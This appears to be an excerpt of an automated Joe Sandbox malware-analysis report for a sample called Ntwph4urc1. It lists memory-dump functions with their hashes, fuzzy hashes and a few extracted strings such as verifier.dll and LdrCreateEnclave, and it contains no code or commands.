                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              • Opcode ID: 1bc937431996169c3d7b2adf3adc10cc15d21c1435c521ff44d201fda0d21295
                                              • Instruction ID: fa813df1ec55539284c2ea9ec774deeb3ffba9fa31fd306437660873188962b8
                                              • Opcode Fuzzy Hash: 1bc937431996169c3d7b2adf3adc10cc15d21c1435c521ff44d201fda0d21295
                                              • Instruction Fuzzy Hash: 873185B6A10302AFE7158F6D9951F2677EDEB48750FB0807AEA05DF381E6318C81C791
                                              Function 36977505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                              • Instruction ID: d5ecd7d362f237d5b0ead62113812e5e1e9f52ce39089fed32fc7936974cac50
                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                              • Instruction Fuzzy Hash: D341C079A00226EBEF21CF84C894BBEB7B8EF44745F20405AE9019B210DB30DD41CBE2
                                              Function 3693FF90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Strings
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36940058
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                              • API String ID: 0-996340685
                                              • Opcode ID: f948387e23e14608aefafd47debccad7f5efddb2ecf04771996ba9b5047adc65
                                              • Instruction ID: dce133da1aac048f80a5a2b6f966aa4dd1c6b1b0e342da89d3ea3bb3423ea62c
                                              • Opcode Fuzzy Hash: f948387e23e14608aefafd47debccad7f5efddb2ecf04771996ba9b5047adc65
                                              • Instruction Fuzzy Hash: C4418175A1074A9ED725EFB4C4406EBB7F8FF49300F21482ED9AAC3240E734A545CBA2
                                              Function 369736EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Flst
                                              • API String ID: 0-2374792617
                                              • Opcode ID: ae3f03c62ea621af059a664e032e0939af114b40e3424a2a52b0c07cba9f1085
                                              • Instruction ID: 7c886a6a6c487d6e75f315e223723efd3ea5486a4a1688e922a16c5004222fa1
                                              • Opcode Fuzzy Hash: ae3f03c62ea621af059a664e032e0939af114b40e3424a2a52b0c07cba9f1085
                                              • Instruction Fuzzy Hash: 704187B5605311DFE704CF19C480A1AFBE8EF89754F60816EE4488F241EB31D946CBD6
                                              Function 36939730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: L4CwL4Cw
                                              • API String ID: 3446177414-1654103815
                                              • Opcode ID: a7a83c4066d4d5f91953911115476794842388ecee99da8edda786da807577e8
                                              • Instruction ID: 80b29a82b8ec826eff7630b26253b9388163c4180d714cf581db4a84c8070449
                                              • Opcode Fuzzy Hash: a7a83c4066d4d5f91953911115476794842388ecee99da8edda786da807577e8
                                              • Instruction Fuzzy Hash: 8B21A476902714AFE722CF59C800B5B7BF9FB84754F360429AA569B391EB34DC01CB91
                                              Function 36945096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: 53ebb9ecc7bb883c9f908400e21d6fc70568c67f73c0120fbbc825e97fb65a54
                                              • Instruction ID: df4ab77abbbed27f8bfe88aa1e88de7b4c713e8bfd8c0f99b30d5b8a83554122
                                              • Opcode Fuzzy Hash: 53ebb9ecc7bb883c9f908400e21d6fc70568c67f73c0120fbbc825e97fb65a54
                                              • Instruction Fuzzy Hash: EB11B178B183128BF726ED89C85061673DAEB8526CF30852AE458CB390DE71DC41C3C0
                                              Function 369C106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              • Opcode ID: 608c20a99b8939aaf17f5b190b59a1f5d5729cc325fa7118c19e8577d45b8b49
                                              • Instruction ID: 675d8d9b79ec6b38db62a420246a543bafc5cfdb566e9de173ae19bbe74c9171
                                              • Opcode Fuzzy Hash: 608c20a99b8939aaf17f5b190b59a1f5d5729cc325fa7118c19e8577d45b8b49
                                              • Instruction Fuzzy Hash: F42104B19183449FC310DF1AC844A9BFBE8BBE5B40F504A1FBA9097250D7B4D805CB97
                                              Function 3699739A Relevance: .7, Instructions: 705COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 28ae6ae82625b2b6ca5a86851b5d5c2177342bce8d6e8387572e48d76c85df23
                                              • Instruction ID: 400387b26bb6ef38b1250b2d157ad66bc34962daefdedfa8794c2882c6aa13cb
                                              • Opcode Fuzzy Hash: 28ae6ae82625b2b6ca5a86851b5d5c2177342bce8d6e8387572e48d76c85df23
                                              • Instruction Fuzzy Hash: EB429D75E006168FEB18CF59C884AAEB7F6FF88354B248569D551AF340DB34EC42CBA1
                                              Function 3696B2C0 Relevance: .6, Instructions: 629COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7a28db194e6ecf6c0f404f070cdca0ba0f218d22897c927cfbbaeb771378b95
                                              • Instruction ID: eb986e19e1b5b0459fdaa8d383f64591f50e826697f3a17d25d1d20b446337fa
                                              • Opcode Fuzzy Hash: d7a28db194e6ecf6c0f404f070cdca0ba0f218d22897c927cfbbaeb771378b95
                                              • Instruction Fuzzy Hash: A632B1B5E00319DBDF14CF9AC880BAEBBB5FF44768F240069E805AB355E7359921CB91
                                              Function 36A016CC Relevance: .6, Instructions: 571COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b41031da430182b2eb9eb30f8b7eb6005818c85bfe5de145f8f364e825280f79
                                              • Instruction ID: 16e0fb47dae3cdda8bf5ac4a12d28159ad14ee634d8e009015fb0ac4f4f12b49
                                              • Opcode Fuzzy Hash: b41031da430182b2eb9eb30f8b7eb6005818c85bfe5de145f8f364e825280f79
                                              • Instruction Fuzzy Hash: C6228079E002168FDB09CF99D890AAABBF2BF89354F64456DD8519F341DB30AD42CF90
                                              Function 3694D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a2ea82f7a5c86a244b77a7b1fa033ea2ee02304f9dee65f7ec8e23a1727e6237
                                              • Instruction ID: ec10b1df02938b0b5b57bc90ab8562fd265a0edda79cb0b3a10f28e3926924f8
                                              • Opcode Fuzzy Hash: a2ea82f7a5c86a244b77a7b1fa033ea2ee02304f9dee65f7ec8e23a1727e6237
                                              • Instruction Fuzzy Hash: 86C10E78E00316DBEB15DF59C840BAEB7FAEFA4754F218269D814AB380D770E855CB90
                                              Function 3695F460 Relevance: .3, Instructions: 321COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8b59aa75b94b839257d899374c6a821c60c688bc525d736f99bbde4984ae21e
                                              • Instruction ID: d580b426900e51dff28781ca0b787226d89ca9e00cdec3286e17878cb13dc5b3
                                              • Opcode Fuzzy Hash: e8b59aa75b94b839257d899374c6a821c60c688bc525d736f99bbde4984ae21e
                                              • Instruction Fuzzy Hash: 7FC13475E02325CBEB14CF19C890BB973A9FB44768F664059EE41DB2A5DB308D42CFA0
                                              Function 369690DB Relevance: .3, Instructions: 287COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: faaa7793fd6040cb78adafc685642e349f05675f72e9032b625c8c2f4f3ef8f9
                                              • Instruction ID: 57b1a737f41bdb736b3b2614136624520372891b3bfc512b8bcc74ecd09356cd
                                              • Opcode Fuzzy Hash: faaa7793fd6040cb78adafc685642e349f05675f72e9032b625c8c2f4f3ef8f9
                                              • Instruction Fuzzy Hash: 3DA145B1910316AFEF12CFA5CC81FAE77B9AF49794F510064FA00AB2A1D7759C05CBA1
                                              Function 369EB550 Relevance: .3, Instructions: 263COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                              • Instruction ID: 99fe4f940e93459f8e015bc4c4cad3845c0f5dad7f49fb0ab85af12a7a4b43c1
                                              • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                              • Instruction Fuzzy Hash: FCA17A75A01601DFD726CF19C680A1AF7FAFF88350B34856AD54ACBA69E731E941CF80
                                              Function 36949486 Relevance: .3, Instructions: 259COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7349044bf1a134959208f8ab1e6985425fe0334a91dd03d864d0b9258462c1c3
                                              • Instruction ID: 2dbb6225034078bbeeff4544b6b5bdb0dd0a2e585e8730b21916f049f9853a51
                                              • Opcode Fuzzy Hash: 7349044bf1a134959208f8ab1e6985425fe0334a91dd03d864d0b9258462c1c3
                                              • Instruction Fuzzy Hash: 92B15BB89083058FEB16DF19C880699B7B9FF09399F744559DC21DB291DB35D843CBA0
                                              Function 369FB52F Relevance: .2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                              • Instruction ID: 31cf0a5b2b2cd2d2a69bd993b36d66279dfd02a6ff87d13a589af6d2a253e356
                                              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                              • Instruction Fuzzy Hash: 6F71F579E2021A9BDB10CF65C890AAFB3F9BF04752F76401AE800DF649E736D951CB90
                                              Function 3696D090 Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                              • Instruction ID: 9637847d1c186b4ce5f7537159b3f74256df725418ed121ed826e3fe55a6e26b
                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                              • Instruction Fuzzy Hash: F1818F76E0031A8FEF18CF59C8807ADB7F2EF84358F66816AD825B7240DA719944DB91
                                              Function 369E375F Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1834df24880886bd82a12adfdcfa1c49a15caef56bf19db613a3afaeb31793c0
                                              • Instruction ID: 939e3bc3c974fc730caca31ee6426543de6e803dbb3cac31fc15ce2d2a684204
                                              • Opcode Fuzzy Hash: 1834df24880886bd82a12adfdcfa1c49a15caef56bf19db613a3afaeb31793c0
                                              • Instruction Fuzzy Hash: DD717A75E10228EFDB12CF99C880AAEB7B5FF4C754F605015E940AB261DB31EC42CBA1
                                              Function 36A0132D Relevance: .2, Instructions: 188COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9007f034aaa6b9d2471d6124722e8d7ef49fdbcf0d92765a725afca81766c8af
                                              • Instruction ID: 855f8bdf8eb683181667da2e0a32eb1606b1c7a010a25a9d4575a0a9e554576d
                                              • Opcode Fuzzy Hash: 9007f034aaa6b9d2471d6124722e8d7ef49fdbcf0d92765a725afca81766c8af
                                              • Instruction Fuzzy Hash: EC815C75A00205DFDB09CFA9C590AAEBBF1FF48304F1581A9D859AB351D734EA51CFA0
                                              Function 36A0903E Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8be74473d7b2b7d72e520b1de149faad70010542b23749c8fe9067e8a5e70381
                                              • Instruction ID: f1e5b2675aa325641787040f8a10a7b9d4241ab1b37d6e5710cf4ce8f420ea5e
                                              • Opcode Fuzzy Hash: 8be74473d7b2b7d72e520b1de149faad70010542b23749c8fe9067e8a5e70381
                                              • Instruction Fuzzy Hash: 0061BBB5608716ABD311CF65DC80BABBBA9FF88754F008619FC5987240DB30E911CF92
                                              Function 36A092A6 Relevance: .2, Instructions: 174COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 883f9cb35d7f76e7f6072baad1e92a52fae16a30995381596f7185fa14ae9d4e
                                              • Instruction ID: 0a7b29e4a4ee56270202d49d7fb28e49a5724d461d42e8d041b241d22a2bf052
                                              • Opcode Fuzzy Hash: 883f9cb35d7f76e7f6072baad1e92a52fae16a30995381596f7185fa14ae9d4e
                                              • Instruction Fuzzy Hash: 5F612675A0C7418BE301CF65E994B5AB7E4BF88708F15546DEC998F281DB36E806CF82
                                              Function 369E3F90 Relevance: .2, Instructions: 171COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 052f7e48f707ae7ada43a21ed0f01f3adcb9538794b078f93221dc2609354f0a
                                              • Instruction ID: 30c44bd0f2fefa38878144ed927ae4813f4baa407de1664e0333ebfa0b6ee97e
                                              • Opcode Fuzzy Hash: 052f7e48f707ae7ada43a21ed0f01f3adcb9538794b078f93221dc2609354f0a
                                              • Instruction Fuzzy Hash: 9151BE71608301DFDB05DF29DC40A5BB7EAEBA8754F61892DF455C7240E734D815CBA2
                                              Function 369BD5D0 Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                              • Instruction ID: c7d5ce1beff0f5c252bb63d31ae0716f46c1b7fbe9f08ff58298149ec1c615c0
                                              • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                              • Instruction Fuzzy Hash: 9551F9BAA00312DFDF01DF668C80AAB77E9EF84694F500429F944C7251EB75C959C7E2
                                              Function 3697B570 Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed239e9abffda92a0b57496fa8d50c22cd5aec9260d14a243e4e168f360e265f
                                              • Instruction ID: eb8c1fea23b5190fa4adfccb1b7597b2951159e430ab50d76ead746cc83b09fd
